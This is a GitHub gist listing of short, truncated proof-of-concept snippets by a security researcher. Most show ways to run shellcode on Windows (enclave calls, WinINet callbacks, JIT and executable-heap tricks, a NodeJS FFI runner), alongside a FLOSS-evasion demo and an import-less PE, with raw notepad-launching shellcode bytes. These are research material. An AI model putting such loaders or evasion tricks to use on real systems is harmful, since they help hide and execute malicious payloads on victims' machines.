Skip to content

Instantly share code, notes, and snippets.

View whokilleddb's full-sized avatar
💭
Helping to make open source a tad bit more secure

whokilleddb whokilleddb

💭
Helping to make open source a tad bit more secure
253 followers · 25 following
View GitHub Profile
@whokilleddb
whokilleddb / enclave.c
Created August 3, 2025 21:35
Run shellcode using LdrCallEnclave
#include <stdio.h>
#include <windows.h>
// Shellcode template from: https://gist.github.com/kkent030315/b508e56a5cb0e3577908484fa4978f12
// Compile using: x86_64-w64-mingw32-gcc -m64 enclave.c -o enclace.exe -lntdll
EXTERN_C NTSYSAPI
NTSTATUS
NTAPI LdrCallEnclave(
_In_ PENCLAVE_ROUTINE Routine,
@whokilleddb
whokilleddb / JasonToddIsTheBestRobin.c
Created August 21, 2025 22:51
Unnecessarily complicated way of controlling shellcode execution using InternetStatusCallback()
#include <windows.h>
#include <wininet.h>
#include <stdio.h>
#pragma comment(lib, "wininet.lib")
// notepad.exe shellcode
char shellcode[] = {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
@whokilleddb
whokilleddb / Program.cs
Created October 29, 2025 22:27
CLR uses an executable heap - so why shouldn't we?
using System;
using System.Runtime.InteropServices;
namespace ExecutableHeapInfo
{
class Program
{
// Import GetProcessExecutableHeap from mscoreei.dll
[DllImport("mscoreei.dll", SetLastError = true)]
private static extern IntPtr GetProcessExecutableHeap();
@whokilleddb
whokilleddb / Program.cs
Created October 29, 2025 22:44 — forked from susMdT/Program.cs
haha funny jit go brrrr
using System;
using System.Runtime.CompilerServices;
using System.Reflection;
using System.Reflection.Emit;
namespace FunkyJit
{
class Program
{
public static void Nothing() { Console.WriteLine(); }
static void Main(string[] args)
@whokilleddb
whokilleddb / main.c
Created July 24, 2025 17:53
PoC code to bypass flare/floss by mandiant
/*
main.c - Demonstrate how easy it is to bypass flare-floss with a single line
Compile with:
x86_64-w64-mingw32-gcc main.c -o main.exe -masm=intel
*/
#include <windows.h>
#include <stdio.h>
@whokilleddb
whokilleddb / LowNtReadFile.c
Created August 12, 2025 21:19
Read contents of a file using LowNtReadFile
#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "ntdll.lib")
#define FILE_TO_READ L"\\??\\C:\\Users\\DB\\Desktop\\test.txt"
EXTERN_C NTSTATUS NtOpenFile(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, ULONG ShareAccess, ULONG OpenOptions);
@whokilleddb
whokilleddb / main.cc
Created July 25, 2025 18:18
Run code before main()
#include <stdio.h>
#ifdef _MSC_VER
#ifdef __cplusplus
#define CONSTRUCTOR_FUNC(func) \
struct func##_constructor { \
func##_constructor() { func(); } \
}; \
@whokilleddb
whokilleddb / Dockerfile
Last active August 7, 2025 04:30
Dockerfile to compile Linux Kernel from source
FROM debian:10.11 as source
WORKDIR /kernel
# Extra Metadata
LABEL version = "0.1.0"
LABEL desciption = "Compile A Kernel"
# Install Dependencies
FROM source as init
RUN apt update -y && apt upgrade -y
@whokilleddb
whokilleddb / launcher.c
Last active August 3, 2025 22:03
PE without any imports!
// Compile with: cl.exe /Ox /W0 /GS- launcher.c
// Check imports with: dumpbin /imports launcher.exe
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(linker, "/entry:WinMain")
// Function Pointers
@whokilleddb
whokilleddb / shellcode.js
Created October 11, 2023 11:16
NodeJS FFI to run shellcode!
const ffi = require('ffi-napi');
const ref = require("ref-napi");
const SIZE_T = ref.types.uint64;
const DWORD = ref.types.uint32;
const VOID = ref.types.void;
const LPVOID = ref.refType(VOID);
const HANDLE = LPVOID;
const LPDWORD = ref.refType(DWORD);